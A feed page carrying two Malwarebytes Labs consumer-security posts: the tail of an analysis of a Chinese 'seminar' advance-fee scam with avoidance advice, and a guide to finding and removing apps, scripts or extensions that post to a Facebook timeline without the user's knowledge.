The attached, clean file includes a “registration form” requiring the following:

  • Company name, address, and bank with account number
  • Attendee’s name, phone number, and email addresses.

This is the point where generic business spam begins to edge closer to malicious. Scammers will take the target’s money, and PII as well for use in further scams. Should a user actually fill this out, they will be signed up for every spammer’s list in perpetuity.

Step 3: the payment

Just in case we were wondering about receipts, the form lets us know that we can pick up our tickets the day of the “training,” and then provides a bank account that we can wire money directly to.

Given that we didn’t pay the guy and we did not go to Shanghai to check out the “venue”, there’s still a possibility that this may be legit. That said:

  • We responded from a free Chinese webmail, offering no company affiliation. This did not faze the scammer.
  • There are estimates that up to 40% of Chinese private educational institutions (training centers, job skills, etc.) are unlicensed and/or fraudulent.
  • The price of this training is 1800 yuan, which makes up a significant portion of the average Chinese monthly wage of 2300 yuan.

The odds are fairly good that there either isn’t any training, or the venue specified actually hosts a pyramid scheme that will train members on how to recruit new marks. Much like a Nigerian scam, this form of advance fee fraud is very common and familiar. Its familiarity is actually a plus, as anyone who responds to such an obvious pitch more or less preselects themselves as a vulnerable and easily manipulated target. And similar to the 419 scam’s exploitation of underdeveloped financial institutions in Nigeria, the seminar scam exploits a void in regulation in the Chinese adult education market. Seminar scams are a great reminder that regardless of the language or culture used, scammers will exploit the same weaknesses online, wherever they are.


So how do you defend yourself against seminar scams? First, don’t respond to the email and definitely don’t disclose any personal information. But also ask yourself, “Have I heard of this institution? Does it have a local reputation?” As well as “What reputable organization advertises in this way?” Probably not too many. Stay safe: be vigilant.

The post Nigerian scams without the Nigerians appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Facebook worries: I didn’t post that

Malwarebytes - Wed, 09/06/2017 - 15:00

It is my assumption that most Facebook users don’t look at their own profile often. By your own profile, I mean the timeline that shows up when you click your own name or avatar in the Facebook menu.

That’s because we think we know exactly what is posted there, so why bother to look at it? After all, isn’t that supposed to be all the stuff that we posted ourselves?

The feeling of disorientation you get when you find something you are sure you didn’t post will be even worse if you notice that supposed messages have been sent from your Facebook Messenger account that you know you never sent. All in all, there might be some discrepancies between what you did and what actually shows up and that’s what this blog post is all about.

How do posts end up on your timeline that you didn’t post?

There are three main reasons that might be of some concern:

  1. Someone or something else has access to your Facebook account
  2. A Facebook app has the authorization to post on your timeline
  3. An active script or browser extension can post on your behalf

In all these cases, there is no immediate reason to worry as long as you know about it and trust the person, app, script, or extension that has access or authorization.

Authorized apps

We have seen it in the past, and I bet there are still active apps being spread among Facebook users by pretending to be spectacular videos. You may remember the “Man found inside Shark” and similar sensational posts, which try to trick you into downloading malware or installing a malicious app.

To check whether an app has the ability to post on your timeline, click on Settings:

On the left-hand side, click on Apps and select any app that doesn’t look familiar or trustworthy. You can see whether they can post on your timeline by looking at their permissions. If they have the authorization to post on your timeline, it will look like this:

Delete apps you don’t trust or no longer use by clicking on the X that shows up when you hover over an app with your mouse pointer in the Apps menu.

Scripts posting on your behalf

It is possible there is an active script (or program) that uses your credentials when you have Facebook opened in your browser. The script does not need to log in, but simply makes use of the fact that you already did log in. It doesn’t matter whether you did that actively or whether you relied on a cookie set in an earlier session.

These scripts can be hiding in your browser cache or in the shortcut that you use to open Facebook. You can find localized and browser-specific help on clearing your cache on this Facebook Help page for several browsers. If you suspect your shortcuts have been altered, you can bypass them by typing the address in your browser’s address bar. Once you are sure the shortcuts have been altered, you can find methods on how to clean your browser shortcuts on our forums.

Browser extensions could be responsible for similar behavior. They can be removed following these procedures:

  • Internet Explorer: Tools (gear icon) > Manage add-ons > Toolbars and Extensions > Select the one(s) you don’t trust one by one and click “Disable”
  • Firefox: Menu (horizontal stripes) > Add-ons > click on “Disable” behind the ones you don’t trust or don’t recall installing.
  • Chrome: Menu (3 dots) > More Tools > Extensions > Uncheck “Enabled” behind the ones you don’t trust or don’t recall installing.
  • Opera: click the Opera icon > Extensions > Extension Manager > click on Disable below the ones you don’t trust or don’t recall installing.

Stolen credentials

I’m posting about this as the last option for a reason: the advice we give here does not only apply to cases where you know that someone or something you didn’t authorize posted on your behalf. If you have experienced or suspect that something or someone has been posting without your knowledge, or one of the other options (scripts, rogue apps) applies, we recommend that you change your password and enable 2FA, if you haven’t already. Even if you have no idea who might have been responsible, we recommend you lock them out before they abuse their access to your account even further. We also recommend doing this even if you found out which app or other method was used, and even if you successfully removed the culprit: keep in mind that the same app or script might have harvested your login credentials and sent them to the threat actors.


What to do when you find posts in your name on Facebook which you did not post:

  1. Try to find out if there is a suspicious or unsolicited Facebook app active on your list that has posting authorization.
  2. Clear the cache of the browser that you use to access Facebook and the shortcuts you use to open Facebook.
  3. Change your password and consider enabling 2FA.



Pieter Arntz

The post Facebook worries: I didn’t post that appeared first on Malwarebytes Labs.

Categories: Techie Feeds
